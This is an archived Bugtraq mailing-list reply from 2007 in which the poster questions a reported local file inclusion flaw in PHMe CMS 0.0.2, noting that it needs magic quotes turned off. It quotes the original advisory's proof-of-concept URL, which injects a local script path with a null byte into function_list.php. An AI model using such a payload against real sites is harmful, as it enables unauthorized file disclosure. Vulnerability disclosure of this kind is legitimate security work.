Bugtraq: Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy

Nmap Security Scanner

Intro

Ref Guide

Install Guide

Download

Changelog

Book

Docs
Security Lists

Bugtraq

Basics

More
Security Tools

More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

Bugtraq mailing list archives

Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy

From: BlackHawk <hawkgotyou () gmail com>
Date: Mon, 23 Jul 2007 18:57:44 +0200

Hello h4ck3riran,

looks like you need mq=off to make this attack..
and this is quite impossible a tthe time because is defailt on..

Monday, July 23, 2007, 4:04:41 PM, you wrote:

# Tilte:  PHMe CMS 0.0.2 local File Include Vulnerabilitiy

# <www.Aria-security.Com For English >
# <www.Aria-Security.net For Persian >
# < Author: You_You >
# < Software: PHMe CMS >
# < Site Script: http://sourceforge.net/projects/phme >

 

 proof Of Concept : 
 
 www.example.com/[path]/resources/function_list.php?action=[Local Script]%00


-- 
Best regards,
 BlackHawk                            mailto:hawkgotyou () gmail com

By Date By Thread

Current thread:

PHMe CMS 0.0.2 local File Include Vulnerabilitiy h4ck3riran (Jul 23)
- Re: PHMe CMS 0.0.2 local File Include Vulnerabilitiy BlackHawk (Jul 23)